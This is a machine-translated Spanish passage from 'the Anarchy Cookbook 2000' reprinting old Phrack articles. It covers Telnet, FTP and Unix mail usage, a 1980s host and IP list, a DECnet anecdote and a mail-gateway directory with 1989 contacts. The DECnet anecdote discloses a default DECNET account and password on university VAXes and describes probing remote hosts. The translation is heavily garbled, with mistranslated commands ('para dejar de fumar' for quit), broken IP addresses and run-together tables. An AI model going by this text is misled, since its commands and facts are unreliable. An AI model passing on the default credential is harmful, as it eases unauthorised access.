FTP, Telnet y SMTP son llamados "protocolos de aplicación", ya que son utilizados directamente por los programas de aplicaciones que permiten a los usuarios hacer uso de la red. Las aplicaciones de red son los programas que implementan estos protocolos y proporcionar una interfaz entre el usuario y el ordenador. Una implementación de un protocolo de red es un programa o paquete de programas que proporciona la función de red deseada, tal como la transferencia de archivos. Dado que los ordenadores se diferencian de un proveedor a otro (por ejemplo, IBM, DEC, CDC), cada equipo debe tener su propia implementación de estos protocolos. Sin embargo, los protocolos están estandarizados para que los equipos pueden interpolar través de la red (es decir, capaz de comprender y procesar los datos de otros). Por ejemplo, un paquete TCP generado por un ordenador IBM se puede leer y procesada por un ordenador diciembre

En muchos casos, los programas de aplicaciones de red utilizar el nombre del protocolo. Por ejemplo, el programa que transfiere los archivos puede ser llamado "FTP" y el programa que permite conexiones remotas puede ser llamado "Telnet". A veces, estos protocolos se incorporan en los paquetes más grandes, como es común con SMTP. Muchas computadoras tienen programas de correo que permiten a los usuarios en el mismo equipo para enviar correo a la otra. Funciones SMTP con frecuencia se añaden a estos programas de correo electrónico para que los usuarios también pueden enviar y recibir correo a través de una red. En tales casos, no hay un programa separado llamado SMTP que el usuario puede acceder, ya que el programa de correo electrónico proporciona la interfaz de usuario para esta función de red.

La aplicación específica de protocolos de red, tales como FTP, se adaptan al hardware y sistema operativo en el que se utilizan. Por lo tanto, la interfaz de usuario exacto varía de una aplicación a otra. Por ejemplo, el protocolo FTP especifica un conjunto de comandos FTP que cada aplicación FTP debe entender y procesar. Sin embargo, éstos se colocan generalmente en un nivel bajo, a menudo invisible para el usuario, que se da un conjunto superior de comandos a utilizar.

Estos comandos de nivel superior no están normalizados por lo que puede variar de una aplicación de FTP a otro. En algunos sistemas operativos, no todos estos comandos

Page 150: 106652012 the Anarchy Cookbook 2000 Es

sentido de igualdad, tales como "Cambiar directorio", o puede tener diferentes significados. Por lo tanto la interfaz de usuario específica que el usuario ve probablemente serán diferentes.

Este archivo describe una implementación genérica de los protocolos de aplicación TCP / IP estándar. Los usuarios deben consultar la documentación local para detalles de sus sitios.

Nombres y direcciones en una redEn el Departamento de Defensa Protocol Suite, cada red se le asigna un número único de identificación. Este número es asignado por una autoridad central, a saber, el Centro de Información de la red dirigida por el SRI, abreviado como SRI-NIC, con el fin de evitar que más de una red de tener el mismo número de red. Por ejemplo, el número de red ARPAnet tiene 10 mientras MIDnet tiene un número más largo, es decir, 128,242. Cada host en una red tiene una identificación única para los otros hosts pueden especificar sin ambigüedad. El número de huéspedes por lo general asignado por la organización que gestiona la red, en lugar de una autoridad central. El número de huéspedes no tienen que ser únicos en todo el conjunto de Internet, sino dos máquinas de la misma red deben tener un único número de host.

La combinación del número de red y el número de host se llama la dirección IP de la máquina y se especifica como un número binario de 32 bits. Todas las direcciones IP en Internet se pueden expresar como números de 32 bits, aunque a menudo se escribe en notación decimal punteada. La notación decimal punteada divide el número de 32 bits en cuatro de ocho bits partes u octetos y cada octeto se especifica como un número decimal. Por ejemplo, 00000001 es el octeto binario que especifica el número decimal 1, mientras que especifica 11000000 192. La notación decimal punteada que hace las direcciones IP mucho más fácil de leer y recordar.

Las computadoras en la Internet también se identifican por los nombres de host, que son cadenas de caracteres, como "phrackvax". Sin embargo, los paquetes IP debe especificar la dirección IP de 32 bits en lugar del nombre de host para alguna forma de traducir nombres de host a direcciones IP debe existir.

Una forma es tener una tabla de nombres de host y sus direcciones IP correspondientes, llamado hosttable. Casi todas las implementaciones de TCP / IP tiene una hosttable, a pesar de las debilidades de este método están obligando a un cambio hacia un nuevo sistema denominado sistema de nombres de dominio. En los sistemas UNIX, el hosttable a menudo se llama "/ etc / hosts". Generalmente, usted puede leer este archivo y averiguar lo que las direcciones IP de servidores son diferentes. Otros sistemas pueden llamar a este archivo con un nombre diferente y hacerlo disponible al público.

Los usuarios de computadoras generalmente se les da cuentas a las que todos los cargos por uso de la computadora se facturan. Incluso si el tiempo de ordenador está libre en una instalación, las cuentas se utilizan para distinguir entre los usuarios y hacer cumplir las protecciones de archivos. El término genérico "usuario" se utilizará en este archivo para hacer referencia al nombre con el que se accede a la cuenta del equipo.

En los primeros días de ARPANET, que fue la primera red para utilizar los protocolos TCP / IP, los usuarios se identifican por su nombre de usuario, seguido por un comercial de "arroba" (@), seguido por el nombre de host en el que la cuenta existía. Las redes no se les dio nombres, per se, aunque la dirección IP especifica un número de red.

Por ejemplo, "caballero @ phrackvax" se refería a usuario "caballero" en el host "phrackvax". Esto no especificó cuál es la red "phrackvax" estaba en marcha, a pesar de que la información se puede obtener mediante el examen de la hosttable y la dirección IP para "phrackvax". (Sin embargo, "phrackvax" es un nombre de host ficticia utilizada para esta presentación.)

Conforme pasó el tiempo, cada equipo de la red tenía que tener una entrada en su hosttable para cada equipo en la red. Cuando varias redes unidas entre sí para formar

Page 151: 106652012 the Anarchy Cookbook 2000 Es

el Internet, el problema del mantenimiento de esta central de hosttable fue de las manos. Por lo tanto, el esquema de nombre de dominio fue introducido para dividir el hosttable y hacerlo más pequeño y más fácil de mantener.

En el esquema de nombres de dominio nuevo, los usuarios siguen siendo identificados por sus nombres de usuario, pero los anfitriones están identificados por su nombre de host y cualquier y todos los dominios de los que forman parte. Por ejemplo, la dirección "[email protected]" especifica nombre de usuario "caballero" en el host "UMCVMB". Sin embargo, el anfitrión "UMCVMB" es una parte del dominio "Missouri", "que es a su vez parte del dominio" EDU ". Hay otros ámbitos en" edu ", aunque sólo uno lleva el nombre de" Missouri ". En el campo" Missouri ", sólo hay un host que se llama" UMCVMB ".

Sin embargo, otros dominios "EDU" teóricamente podría tener hosts con el nombre "UMCVMB" (aunque yo diría que esto es bastante improbable en este ejemplo). Así, la combinación de nombre de host y todos sus dominios lo hace único. El método de la traducción de nombres a direcciones IP ya no es tan sencillo como buscar el nombre de host en una mesa. Varios protocolos de red y software especializado llamado servidores de nombres y resolución de aplicar el sistema de nombre de dominio.

No todas las implementaciones de TCP / IP compatible con nombres de dominio, ya que es bastante nuevo. En esos casos, la hosttable local ofrece la única manera de traducir nombres de host a direcciones IP. El administrador del sistema de ese equipo tendrá que poner una entrada en el hosttable para cada máquina que el usuario lo desea, puede conectarse. En algunos casos, los usuarios pueden consultar el servidor de nombres propios para averiguar la dirección IP de un determinado nombre de host y luego utilizar esa dirección IP directamente en lugar de un nombre de host.

He seleccionado unos pocos hosts de la red para demostrar cómo un sistema host se puede especificar tanto la dirección numérica de host y de acogida. Algunos de los nodos que he seleccionado son también nodos de BITNET, tal vez incluso algunos de los otros que no hacen una nota de debido a la falta de conocimiento omnisciente sobre todas y cada una solo sistema host en el mundo :-)

Numérica Bitnet Nombre de la máquina Ubicación18.72.0.39 ATHENA.MIT.EDU Instituto de Tecnología de Massachusetts MIT26.0.0.73 SRI-NIC.ARPA DDN Network Information Center -36.21.0.13 MACBETH.STANFORD.EDU La Universidad de Stanford?36.21.0.60 PORTIA.STANFORD.EDU La Universidad de Stanford?128.2.11.131 ANDREW.CMU.EDU Carnegie Mellon Univ.. ANDREW128.3.254.13 LBL.GOV Lawrence Berkeley Labrotories LBL128.6.4.7 RUTGERS.RUTGERS.EDU La Universidad de Rutgers?128 ½ 9.99.1 CUCARD.MED.COLUMBIA.EDU La Universidad de Columbia?128.102.18.3 AMES.ARC.NASA.GOV Centro de Investigación Ames [NASA] -128.103.1.1 HARVARD.EDU Harvard, la Universidad de Harvard128.111.24.40 HUB.UCSB.EDU Universidad. De Santa Bárbara?128.115.14.1 LLL-WINKEN.LLNL.GOV Lawrence Livermore Labratories -128.143.2.7 UVAARPA.VIRGINIA.EDU Universidad de Virginia?128.148.128.40 BROWNVM.BROWN.EDU La Universidad de Brown BROWN128.163.1 ½ UKCC.UKY.EDU Universidad de Kentucky UKCC128.183.10.4 NSSDCA.GSFC.NASA.GOV Goddard Space Flight Center [NASA] -128.186.4.18 RAI.CC.FSU.EDU Universidad Estatal de Florida FSU128.206.1.1 UMCVMB.MISSOURI.EDU Universidad. de MissouriColumbia UMCVMB128.208.1.15 MAX.ACS.WASHINGTON.EDU Universidad de Washington MAX128.228.1.2 CUNYVM.CUNY.EDU Universidad de la Ciudad de Nueva York CUNYVM129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU Northeastern University NUHUB131.151.1.4 UMRVMA.UMR.EDU Universidad de Missouri Rolla UMRVMA192.9.9.1 SUN.COM Sun Microsystems, Inc. -192.33.18.30 VM1.NODAK.EDU North Dakota State Univ. NDSUVM1192.33.18 ½ 0 PLAINS.NODAK.EDU North Dakota State Univ. NDSUVAX

Page 152: 106652012 the Anarchy Cookbook 2000 Es

Nota: No todos los sistemas de Bitnet tiene una dirección IP. Del mismo modo, no todos los sistemas que tiene una dirección IP se encuentra en BITNET. Asimismo, si bien algunos lugares como la Universidad de Stanford podrían tener los nodos de BITNET y tienen las máquinas de la propiedad intelectual, así, esto no implica necesariamente que los sistemas de BITNET y el IP (el dominio EDU, en este caso) son los mismos sistemas.

Los intentos de obtener acceso no autorizado a los sistemas en Internet no son toleradas y que es legalmente un delito federal. En algunos ejércitos, se toman esto muy en serio, sobre todo el gobierno anfitrión, tales como el Centro Goddard de Vuelo Espacial, en la que no le importa que se lo indica en el indicador principal, cuando se conecta a su sistema.

Sin embargo, algunos nodos son el acceso del público a un grado. El Centro de DDN Red de Información pueden ser utilizados por cualquier persona. El servidor y base de datos ha demostrado ser una valiosa fuente de información cuando la localización de las personas, sistemas, y otra información que está relacionada con la Internet.

TelnetInicio de sesión remoto se refiere a iniciar sesión en un equipo remoto desde un terminal conectado a un equipo local. Telnet es el protocolo estándar en la suite del Departamento de Defensa para el cumplimiento de este Protocolo. El "rlogin" programa, dotado de los sistemas Berkeley UNIX y otros sistemas, también permite el acceso remoto.

Para los propósitos de la discusión, el "equipo local" es el equipo con el que el terminal está conectado directamente, mientras que el "equipo remoto" es el ordenador de la red a la que usted se está comunicando y que su terminal * NO * es directamente conectada.

Debido a que algunos equipos utilizan un método diferente de conectar las terminales a las computadoras, una mejor definición sería la siguiente: El "equipo local" es el equipo que está utilizando actualmente y el "equipo remoto" es el ordenador de la red con la que son o se va a comunicar. Tenga en cuenta que los términos "de acogida" y "equipo" son sinónimos en la siguiente discusión.

Para usar Telnet, simplemente escriba el comando: telnet

El mensaje que da es Telnet: Telnet>

(Sin embargo, puede especificar dónde desea Telnet para inmediatamente y pasar por alto las indicaciones y otros retrasos al ejecutar el comando:. TELNET [lugar])

Hay ayuda disponible, simplemente introduciendo?. Esto imprime una lista de toda la válidasubcomandos que Telnet proporciona una explicación de una línea.

Telnet>?

Para conectarse a otro ordenador, utilice el subcomando abierto para abrir una conexióna ese equipo. Por ejemplo, para conectarse al host "UMCVMB.MISSOURI.EDU",hacer "umcvmb.missouri.edu abierto"

Telnet resolver (es decir, Translate, el nombre de host "umcvmb.missouri.edu" en unDirección IP y le enviará un paquete a ese host solicitante de inicio de sesión. Si el mando a distanciaanfitrión decide a dejar de intentar un inicio de sesión, se le pedirá su nombre de usuario y una contraseña. Si el host no responde, Telnet "tiempo fuera" (es decir, esperar por una cantidad razonable de tiempo, como 20 segundos) y luego terminar con un mensaje como "no Host de responder."

Page 153: 106652012 the Anarchy Cookbook 2000 Es

Si su equipo no tiene una entrada para un host remoto en su hosttable y no se puede resolver el nombre, puede utilizar la dirección IP de forma explícita en el comando telnet. Por ejemplo,

TELNET 26.0.0.73 (Nota: Esta es la dirección IP de la DDN Network Information Center [SRI-NIC.ARPA])

Si tienen éxito en la sesión, el terminal está conectado a la máquina remota. Para todos los efectos, el terminal está directamente conectado para que el anfitrión y usted debería ser capaz de hacer nada en su terminal a distancia que se puede hacer en cualquier terminal local. Hay algunas excepciones a esta regla, sin embargo.

Telnet proporciona un carácter de escape de la red, tales como Control-T. Puede averiguar cuál es el carácter de escape es por entrar en el "status" subcomando:

Telnet> Estado

Puede cambiar el carácter de escape mediante la introducción de la "fuga" subcomando:

Telnet> escape

Cuando se escribe en el carácter de escape, los beneficios del sistema de Telnet a la pantalla y usted puede entrar en los subcomandos. Por ejemplo, para romper la conexión, que generalmente se cierra la sesión en el host remoto, introduzca el subcomando "quit":

Telnet> para dejar de fumar

Su conexión Telnet generalmente se rompe cuando cierra sesión en el host remoto, por lo que el "quit" subcomando no se suele usar para cerrar la sesión.

Cuando usted está conectado a un ordenador remoto a través de Telnet, recuerde que hay un retraso de tiempo entre el equipo local y el remoto. A menudo, esto se hace evidente a los usuarios al desplazarse una larga fila a través de la pantalla del terminal y desean cancelar el desplazamiento por el pulsar Control-C o algo similar. Después de escribir el carácter de control especial, el desplazamiento continúa. El carácter especial de control tiene una cierta cantidad de tiempo para alcanzar el equipo remoto que sigue siendo la información de desplazamiento. Por lo tanto la respuesta desde el equipo remoto no es probable que sea tan rápida como la respuesta de un equipo local. Una vez que esté conectado de forma remota, el equipo que está conectado de manera efectiva se convierte en su "equipo local", a pesar de que el original "equipo local" sigue considerando que inició la sesión. Puede iniciar sesión en un tercer equipo que luego se convertiría en su "equipo local" y así sucesivamente. A medida que la sesión de cada período de sesiones, la sesión anterior se vuelve a activar.

De transferencia de archivosFTP es el programa que permite que los archivos que se envían desde un ordenador a otro."FTP" significa "File Transfer Protocol".

Cuando se inicia a través de FTP, un canal de comunicación con otro equipo de la red se abre. Por ejemplo, para empezar a usar FTP e iniciar una sesión de transferencia de archivos con una computadora en la red llamado "UMCVMB", usted debe ejecutar el siguiente subcomando: FTP UMCVMB.MISSOURI.EDU

Anfitrión "UMCVMB" le pedirá un nombre de cuenta y contraseña. Si su conexión es correcta, FTP le dirá que, de lo contrario va a decir "login incorrecto". Inténtelo de nuevo o cancelar el programa de FTP. (Esto se hace generalmente escribiendo un carácter de control especial, como Control-C. La "interrupción del programa" carácter varía de sistema a sistema.)

Page 154: 106652012 the Anarchy Cookbook 2000 Es

A continuación verá el indicador de FTP, que es la siguiente:

Ftp>

Hay una serie de subcomandos de FTP. El subcomando "?" mostrará una lista de estos comandos y una breve descripción de cada uno.

Usted puede iniciar una transferencia de archivos en cualquier dirección a través de FTP, ya sea desde el host remoto o el host remoto. El "get" subcomando inicia una transferencia de archivos desde la máquina remota (es decir, le dice al ordenador remoto para enviar el archivo al equipo local [aquella en la que ha emitido el comando "ftp"]). Basta con introducir "get" y FTP le pedirá el nombre del archivo de la máquina remota y el nombre del (nuevo) del host local de archivos. Ejemplo:

Ftp> getNombre del archivo remoto?theirfilenombre del archivo local?miarchivo

Puede abreviar esto escribiendo los dos nombres de archivo en la misma línea que el "get" subcomando. Si no se especifica un nombre de archivo local, el nuevo archivo local se llama lo mismo que el archivo remoto. Válidos los subcomandos ftp para obtener un archivo son las siguientes:

obtener theirfile miarchivoobtener doc.x25

El "poner" las obras del subcomando de una manera similar y se utiliza para enviar un archivo desde el equipo local al equipo remoto. Introduzca el comando "put" y FTP le pedirá el nombre del archivo local y luego el nombre del archivo remoto. Si la transferencia no se puede hacer porque el archivo no existe, o por alguna otra razón, FTP mostrará un mensaje de error.

Hay una serie de otros subcomandos de FTP que te permite hacer muchas más cosas. No todos ellos son estándar, así que consulte la documentación de su local o escriba un signo de interrogación en la línea de comandos FTP. Algunas de las funciones a menudo integrados en FTP incluyen la posibilidad de revisar los archivos antes de conseguir o poner ellos, la capacidad para cambiar de directorio, la posibilidad de borrar archivos en el equipo remoto, y la capacidad de la lista del directorio en el host remoto.

Una función interesante de muchas implementaciones de FTP es "transferencias de terceros." Por ejemplo, si ha iniciado sesión en el equipo A y quiere hacer que el equipo B para enviar un archivo a la computadora C, se puede usar FTP para conectar con el equipo B y utilizar el "rmtsend" de comandos. Por supuesto, usted tiene que saber los nombres de usuario y contraseñas en los tres equipos, ya que nunca FTP le permite mirar a alguien en el directorio y los archivos a menos que sepa su nombre de usuario y una contraseña.

El "CD" subcomando cambia su directorio de trabajo en la máquina remota. El "lcd" subcomando cambia el directorio en el host local. Para los sistemas UNIX, el significado de estos subcomandos es obvia. Otros sistemas, especialmente aquellos que no tienen estructurado el directorio de sistema de archivos, no puede llevar a cabo estos comandos o puede ponerlos en práctica de una manera diferente.

Los "dir" y "ls" subcomandos de hacer lo mismo, es decir, una lista de los archivos en el directorio de trabajo de la máquina remota.

La "lista" subcomando muestra el contenido de un archivo sin llegar a poner en un archivo en el equipo local. Esto sería útil si lo que quería inspeccionar un archivo. Usted podría interrumpir antes de llegar al final del archivo, escriba Control-C o algún otro carácter especial. Esto depende de la implementación de FTP.

Page 155: 106652012 the Anarchy Cookbook 2000 Es

El comando "Borrar" se puede borrar archivos en el host remoto. También se puede hacer y eliminar directorios en el host remoto con "mkdir" y "rmdir". El "estado" subcomando le dirá si está conectado y con quién y qué son el estado de todas sus opciones.

Si va a transferir archivos binarios o archivos con los caracteres no imprimibles, active el modo binario por entrar en el "binario" subcomando:

binario

Para reanudar las transferencias no binarios, entrar en el "ascii" subcomando.

La transferencia de un número de archivos se puede realizar fácilmente mediante el uso de "mput" (opción de venta múltiple) y "mget" (múltiple se obtiene). Por ejemplo, para obtener todos los archivos en un directorio en particular, el primer número de "cd" para cambiar a ese directorio y luego un comando "mget" con un asterisco para indicar todos los archivos:

cd algundirectoriomget *

Cuando haya terminado, utilice el "cierre" subcomando para romper el enlace de comunicaciones. Usted seguirá siendo en el FTP, por lo que debe utilizar el "adiós" subcomando para salir de FTP y volver al nivel de comando. El "quit" subcomando se cerrará la conexión y la salida de FTP, al mismo tiempo.

CorreoEl correo es la instalación más sencilla red para utilizar de muchas maneras. Todo lo que tienes que hacer es crear un mensaje, que se puede hacer con un editor de archivos o en el fragor del momento, y luego enviarlo. A diferencia de FTP y Telnet, usted no necesita saber la contraseña del usuario en el equipo remoto. Esto es así porque no se puede cambiar o acceder a los archivos del usuario remoto, ni puede utilizar su cuenta para ejecutar los programas. Todo lo que puedes hacer es enviar un mensaje.

Es probable que haya un programa en el equipo local, que hace de correo entre los usuarios de ese equipo. Dicho programa se denomina un anuncio publicitario. Esto puede o no puede ser la manera de enviar o recibir correo desde otros ordenadores de la red, a pesar de anuncios publicitarios integrados son cada vez más común. Programas de correo de UNIX se utiliza como ejemplo en esta discusión.

Tenga en cuenta que el protocolo que se utiliza para enviar y recibir correo a través de una red TCP / IP se llama SMTP, el "Simple Mail Transfer Protocol". Típicamente, usted no utilizará ningún programa que se llama SMTP, sino más bien su programa de correo local.

Programas de correo de UNIX suelen ser utilizados por la invocación de un programa llamado "correo". Para recibir correo nuevo, simplemente escriba "correo". Hay varios tipos de programas de correo UNIX existentes. Consulte la documentación para obtener más información. Por ejemplo, el comando "mail man" imprime las páginas de manual para el programa de correo en su ordenador.

Para enviar correo electrónico, por lo general, especifique la dirección del destinatario en el comando mail. Por ejemplo: "[email protected] electrónico", enviará el siguiente mensaje a nombre de "caballero" en el host "umcvmb".

Generalmente, usted puede escribir su mensaje de una línea a la vez, pulsando RETURN después de cada línea y escribir CONTROL-D para finalizar el mensaje. Otras instalaciones que incluyen archivos ya existentes a veces existen. Por ejemplo, en Berkeley UNIX permiten introducir comandos similares al siguiente para incluir un archivo en el mensaje de correo electrónico actual:

r miarchivo

En este ejemplo, el contenido de "miarchivo" se insertan en el mensaje en este punto.

Page 156: 106652012 the Anarchy Cookbook 2000 Es

La mayoría de sistemas UNIX permiten enviar un archivo a través del correo electrónico mediante el uso de la redirección de entrada. Por ejemplo:

electrónico [email protected] <miarchivo

En este ejemplo, el contenido de "miarchivo" se envían como un mensaje de "caballero" en la "umcvmb".

Tenga en cuenta que en muchos sistemas UNIX la única distinción entre el correo con destino a otro usuario en el mismo equipo y otro usuario en un equipo remoto es simplemente la dirección especificada. Es decir, no hay nombre de sistema para los receptores locales. De lo contrario, el correo funciones exactamente de la misma manera. Esto es común para los paquetes de correo integrado. El sistema sabe si para enviar el correo de forma local oa través de la red basándose en la dirección y el usuario está protegido de cualquier otro detalle.

"La búsqueda del conocimiento no tiene fin ..."

123.Phrack Magazine - vol. 3, Número 27 por Knight Lightning

Prólogo Por VMS Ninguno UsuariosDECnet es la red para las máquinas de diciembre, en la mayoría de los casos se puede decir VAX. DECnet le permite hacer:

• e-mail• de transferencia de archivos• inicio de sesión remoto• mando a distancia• entrada de trabajo a distancia• TELÉFONO

Teléfono es una comunicación interactiva entre los usuarios y es igual al HABLAR en UNIX o un "lujo"-CHAT en VM / CMS.

BELWUE, la red de la universidad del estado de Baden-Wuerttemberg, en el oeste de Alemania contiene (además de otras redes) una DECnet con alrededor de 400 VAX. En cada VAX no es estándar, cuenta denominada DECNET con pw: = DECNET, que no es accesible a través de acceso remoto. Esta cuenta es proporcionada por varios DECnet-Utilidades y como un pseudo-guest-cuenta. La cuenta ha DECNET muy restringido privilegios: No se puede editar un archivo o hacer otro inicio de sesión remoto.

El AYUDA está equipado con el sistema y es similar al comando man en UNIX.

Más información sobre DECnet se pueden encontrar en "Mirar alrededor En DECnet" por el pensamiento profundo de este tema tan de Phrack Inc.

Aquí, en la Universidad de Ulm, tenemos un * muy * ignorantes personal del centro de informática, con una carencia aún mayor de sistema de la literatura (además de la de 80 kg de VAX / VMS manuales). El activo puede buscar información por sí mismo, que está por encima del nivel de "correr", "FORTRAN", o "cerrar sesión". Mi buena suerte que tengo otras cuentas en el BELWUE-DECnet, donde se ofrece más información para los usuarios. Soy un estudiante regular en Ulm y todas mis cuentas son completamente legales y que corresponde a las leyes alemanas. Yo no me considero un "hacker", me siento más como un "usuario" (... es más una definitoria de problemas).

En la ayuda del menú en una serie de Tübingen Me pareció que el netdcl.com archivo y la explicación correspondiente, el cual envía comandos al DECNET-VAX en cuenta las demás y se ejecuta allí (mando a distancia). La explicación en la ayuda del menú era a prueba de idiotas - por lo tanto, para mí también :-)

Con el comando "$ mcr ncp mostrar los nodos conocidos" se puede obtener una lista de todos los activos Netwide VAX, como es conocido en general, y así que hacer ping a

Page 157: 106652012 the Anarchy Cookbook 2000 Es

todas estas VAX es para buscar más información de un usuario en el conocimiento sed. En "Ayuda", "dir" y otros comandos similares Miro a mi alrededor a esas cuentas DECnet, siempre atentos a temas relacionados con la BELWUE de la red. Es una lástima, que 2/3 de todos los VAX ha bloqueado el DECNET-Cuenta de NETDCL.COM. Sus administradores de sistemas son probablemente miedo de acceso no autorizado, pero no puedo imaginar cómo podría haber dicho acceso no autorizado, porque no se puede iniciar sesión en esta cuenta - no hay oportunidad para que los caballos de Troya, etc

Algunos administradores de sistema me volvió a llamar después de visitar a su VAX para charlar conmigo acerca de la red y me preguntó si me podían ayudar de cualquier manera. Un operador de sistema de Stuttgart, incluso me envió una versión de NETDCL.COM para el sistema operativo ULTRIX.

Entonces, después de un mes, el horror se apoderó de mí en la forma de un correo electrónico lo siguiente:

-------------------------------------------------- ----------De: Tuebingen :: SISTEMA 31-MAY-1989 15:31:11.38Para: FRAMSTAGCC:Asunto: no hacen ninguna mierda, o te echaron!

De: ITTGPX :: SISTEMA 29-MAY-1989 16:46Para: Tuebingen :: SISTEMATema: Sistema de ruptura en el 01-mayo-1989

Para el administrador del sistema de la computadora Tubinga,

El 1 de mayo 1989 teníamos un sistema de doma en nuestra DECNET cuenta, que se inició desde su máquina. Con la ayuda de nuestra contabilidad nos aseguramos de su FRAMSTAG usuario han emulado un inicio de sesión interactiva en nuestra espina dorsal-nodo y en todos los equipos de nuestra VAX-grupo con el "caballo de Troya" NETDCL.COM. Danos el nombre del usuario y la dirección y querido por la ocurrencia por completo. Se señala que el usuario es punible. En caso de reincidencia se verían obligados a tomar las medidas correspondientes. Vamos a comprobar si nuestro sistema se lesionó. Si no, esta vez no tendrá en cuenta cualquier medida. Informar a nosotros a través de DECnet sobre los resultados de su investigación - que son alcanzables por la NodeNumber 1084 :: Información del sistema

Dipl.-Ing. Michael Hager-------------------------------------------------- ----------

Mi administrador de sistema me amenazó con el borrado de mi cuenta, si no de inmediato aclarar el asunto. * Gulp *! Yo era consciente de mi inocencia, pero ¿cómo decirle a los demás? Le expliqué, paso a paso, todo a mi administrador del sistema. Comprendió entonces después de un tiempo, pero el procedimiento penal aún se cernía sobre mí ... Por lo tanto, tomé rápidamente a mi teclado, para componer el archivo de las explicaciones y enviarlo a la gerente de sistemas de ira en Stuttgart (nodo 1084 es un instituto de allí). Pero no hay manera de salir: había quedado sin cuota de disco y mi explicación de correo electrónico entró en el Nirwana:

-------------------------------------------------- ----------$ Mail explicación Para: 1084 :: Información del sistema% CORREO-E, error al enviar al sistema del usuario en el 1084%-MAIL E-OPENOUT, error al abrirSYS $ sysroot: [SYSMGR] por correo de $ 00040092594FD194.MAI;como salida-RMS-E-CRE, el archivo de los países ACP no crear-SISTEMA-F-EXDISKQUOTA, la cuota de disco excedido-------------------------------------------------- ----------

Page 158: 106652012 the Anarchy Cookbook 2000 Es

También el intento de una conexión con el teléfono-centro no: en su fronteras hacker paranoia, le cortó el teléfono ... y en ninguna parte se encuentra una lista con las direcciones reales de lo virtual de direcciones disponibles, DECnet (para evitar la piratería). Ahora me quedé con la marca "hacker peligroso!" y yo no tenía la oportunidad de reivindicar a mí mismo. Eché un vistazo a mis problemas a un conocido mío, que es un operador de sistema en la computadora del centro de Friburgo. Pidió a los operadores del sistema y otros a través de los gestores de toda la red BELWUE hasta que alguien le dio un número de teléfono a los pocos días - y que era la correcta!

Llamé a este Hager y le conté lo que había hecho con su DECnet-cuenta y también lo que no. Quería saber que el crimen que había cometido. Inmediatamente canceló todos sus reproches, pero no excusar sus incriminaciones difame. Le rogué que informar a mi administrador del sistema en Tubinga que no he hecho nada ilegal y para que dejara de borrar mi cuenta. Esto sucede ya que un compañero mío (en este caso, Hager era también culpable). Él me prometió que oficialmente cancelar sus reproches.

Después de más de una semana esto no ocurre (se me permite usar mi cuenta más adelante). A cambio de ello, he recibido un nuevo correo de Hager en otra cuenta de la mía:

-------------------------------------------------- ----------Desde: 1084 :: HAGER 1-junio-1989 12:51Para: 50180 :: STUD_11Tema: Sistema sin precedentes en

El 01 de junio 1989 usted ha cometido un sistema sin precedentes en por lo menos en uno de nuestros VAX. Hemos sido capaces de registrar este suceso. Nos veríamos obligados a tomar medidas aún más si usted no querida por la ocurrencia por completo hasta 06 de junio.

Por supuesto los gastos que implicaba que se le imponen. Por lo tanto la iluminación debe estar en su propio interés.

Nos son alcanzables a través DECnet-mail con la dirección 1084 :: HAGER o por seguirdirección:

Institut fuer Technische Thermodynamik und Verfahrenstechnik ThermischeDipl.-Ing. M. Hager Tel:. 0711/685-6109Dipl.-Ing. M. Mrzyglod Tel:. 0711/685-3398Pfaffenwaldring 9/10-17000 Stuttgart-80

M. Hager M. Mrzyglod-------------------------------------------------- ----------

Esta fue la reacción de mi intento: "TELÉFONO $ 1084 :: SISTEMA". No he respondido a este correo. Estoy harto de TI!

124. Phrack Magazine - vol. 3, Número 28, por Taran King

ACSNETAustralia Ciencias de la Computación de red (ACSNET), también conocida como Oz, tiene su puerta de entrada a través de la munnari.oz.au CSNET nodo y si no puede directamente correo al dominio oz.au, pruebe nombre de usuario @% munnari.oz.au UUNET. UU.NET o munnari! [email protected].

AT & T MAILAT & T Mail es un servicio de correo de AT & T, probablemente lo que podríamos llamar su MCI-Mail equivalente. Está disponible en la red UUCP attmail nodo del nombre, pero he tenido problemas con conseguir a través de correo electrónico. Al parecer, cuesta

Page 159: 106652012 the Anarchy Cookbook 2000 Es

dinero para enviar a este servicio y los ganglios que rodean no están dispuestos a pagar la cuenta para el correo entrante, o por lo menos, esto parece haber sido el caso hasta el momento. Creo, sin embargo, que tal vez de enrutamiento para att! Attmail! Usuario podría trabajar.

AT & T anunció recientemente seis nuevas interconexiones X.400 entre AT & T Mail y servicios de correo electrónico en los EE.UU., Corea, Suecia, Australia y Finlandia. En los EE.UU., AT & T Mail está interconectado con el servicio de Telenet Communications Corporation, Telemail, permitiendo a los usuarios de ambos servicios para intercambiar mensajes con facilidad. Con la incorporación de estas interconexiones, el AT & T Mail Gateway 400 Service permite a los suscriptores de AT & T de correo para intercambiar mensajes con usuarios de los siguientes sistemas de mensajería electrónica:

Empresa E-mail Nombre PaísTeleDelta TEDE 400 SueciaOTC MPS400 AustraliaTelecom-Canadá Envoy100 CanadáDACOM DACOM MHS CoreaP & T-Tele MailNet 400 FinlandiaHelsinki Telephone Co. ELISA FinlandiaDialcom Dialcom EE.UU.Telenet Telemail EE.UU.KDD Messavia JapónTranspac ATLAS400 Francia

Las interconexiones se basan en el estándar X.400, un conjunto de directrices para el formato, la entrega y recepción de mensajes electrónicos recomendados por un comité de normas internacionales del CCITT. Internacionales mensajes X.400 recargo. Ellos son:

Para Canadá:Por nota: 0,05 dólaresPor unidad de mensaje: 0.10 dólares

Para otros destinos internacionales:Por nota: $ 0.20Por mensaje de unidad: $ 0 ½

No hay recargo por mensajes X.400 dentro de los EE.UU. Los siguientes son los contactos para hablar con alrededor de correo a través de estas redes mencionadas. Otras preguntas pueden ser dirigidas a través de número telefónico gratuito de AT & T Mail, 1-800-624-5672.

MHS Puerta de enlace: Atlas MHS MHS Puerta de enlace:! Mhs DacomAdministrador: Bernard Tardieu Administrador: Bob NicholsonTranspac AT & TTeléfono: 3399283203 Morristown, NJ 07960Teléfono: +1 201 644 1838

MHS Gateway: MHS MHS Dialcom Puerta de enlace:! Mhs elisaAdministrador: Sr. Laraman Administrador: UllaKarajalainenDialcom Nokia DataSouth Plainfield, NJ 07080 Teléfono: 01135804371Teléfono: +1 441 493 3843

MHS Puerta de enlace: el enviado de MHS MHS Puerta de enlace:! Mhs KDDAdministrador: Kin C. Ma. del administrador: Shigeo LwaseTelecom Canadá Kokusai Denshin Denwa COTeléfono: +1 613 567 7584 Teléfono: 8133477419

MHS Gateway: MHS MHS mailnet Puerta de enlace:! Mhs OTCAdministrador: Kari Aakala Administrador: Gary W.Krumbine

Page 160: 106652012 the Anarchy Cookbook 2000 Es

